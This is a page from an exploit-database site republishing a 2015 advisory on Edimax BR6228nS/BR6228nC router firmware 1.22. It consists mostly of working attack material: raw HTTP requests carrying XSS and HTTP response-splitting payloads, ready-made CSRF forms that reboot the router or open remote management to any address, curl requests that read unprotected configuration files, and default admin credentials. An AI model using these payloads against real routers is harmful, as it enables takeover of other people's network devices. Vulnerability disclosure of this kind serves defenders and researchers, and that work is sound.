0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Edimax BR6228nS/BR6228nC - Multiple vulnerabilities

Author

Smash_

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

# Title: Edimax BR6228nS/BR6228nC - Multiple vulnerabilities
# Date: 01.09.15
# Vendor: edimax.com
# Firmware version: 1.22
# Author: Smash_
# Contact: smash [at] devilteam.pl

Few vulnerabilities found in Edimax BR6228nS/BR6228nC router firmware.


1/ Cross Site Scripting

Request:
POST /goform/formWizSetup HTTP/1.1
Host: 192.168.0.10:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10:8080/main.asp
Cookie: language=0
Authorization: Basic YWRtaW46MTIzNA==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

setPage=x");alert("X&wizEnabled=1

Response:
HTTP/1.0 200 OK
Server: GoAhead-Webs

<html>
<body class="background" onLoad=document.location.replace("x");alert("X")></html>



2/ HTTP Response Splitting

Request:
POST /goform/formReflashClientTbl HTTP/1.1
Host: 192.168.0.10:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10:8080/stadhcptbl.asp
Cookie: language=0
Authorization: Basic YWRtaW46MTIzNA==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 163

submit-url=%2Fstadhcptbl.asp%0d%0aXXX%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<script>alert('X')</script>

Response:
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Fri Nov 16 18:08:51 2012
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://192.168.0.10:8080/stadhcptbl.asp
XXX
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html

<script>alert('X')</script>



3/ Cross Site Request Forgery

Examples:

<html>
  <!-- Reboot -->
  <body>
    <form action="http://192.168.0.10:8080/goform/formReboot" method="POST">
      <input type="hidden" name="reset&#95;flag" value="0" />
      <input type="hidden" name="submit&#45;url" value="&#47;tools&#46;asp" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>

  -

<html>
  <!-- Enable remote access -->
  <body>
    <form action="http://192.168.0.10:8080/goform/formReManagementSetup" method="POST">
      <input type="hidden" name="reManHostAddr" value="0&#46;0&#46;0&#46;0" />
      <input type="hidden" name="reManPort" value="8080" />
      <input type="hidden" name="reMangEnable" value="ON" />
      <input type="hidden" name="submit&#45;url" value="&#47;system&#46;asp" />
      <input type="hidden" name="" value="" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>

 -
 
<html>
  <!-- XSS -->
  <body>
    <form action="http://192.168.0.10:8080/goform/formWizSetup" method="POST">
      <input type="hidden" name="setPage" value="x&quot;&#41;&#59;alert&#40;&quot;X" />
      <input type="hidden" name="wizEnabled" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>



4/ Unprotected files

Following url's can be requested without http authorisation in order to obtain detail informations about router:

http://192.168.0.10:8080/FUNCTION_SCRIPT
http://192.168.0.10:8080/main.asp

Example:

devil@hell:~$ curl -ig http://192.168.0.10:8080/
HTTP/1.1 401 Unauthorized
Server: GoAhead-Webs
Date: Fri Nov 16 18:28:39 2012
WWW-Authenticate: Basic realm="Default: admin/1234"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html

devil@hell:~$ curl -ig http://192.168.0.10:8080/FUNCTION_SCRIPT
HTTP/1.0 200 OK
Date: Fri Nov 16 18:28:47 2012
Server: GoAhead-Webs
Last-modified: Fri Nov 16 09:57:30 2012
Content-length: 997
Content-type: text/html

_DATE_="2012.11.16-17:51:47"
_VERSION_="1.22"
_MODEL_="BR6228GNS"
_MODE_="EdimaxOBM"
_PLATFORM_="RTL8196C_1200"
_HW_LED_WPS_="4"
_HW_LED_POWER_="6"
_HW_LED_WIRELESS_="2"
_HW_LED_USB_="17"
_HW_BUTTON_RESET_="5"
(...)

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Edimax BR6228nS/BR6228nC - Multiple vulnerabilities

Report Error

Report Error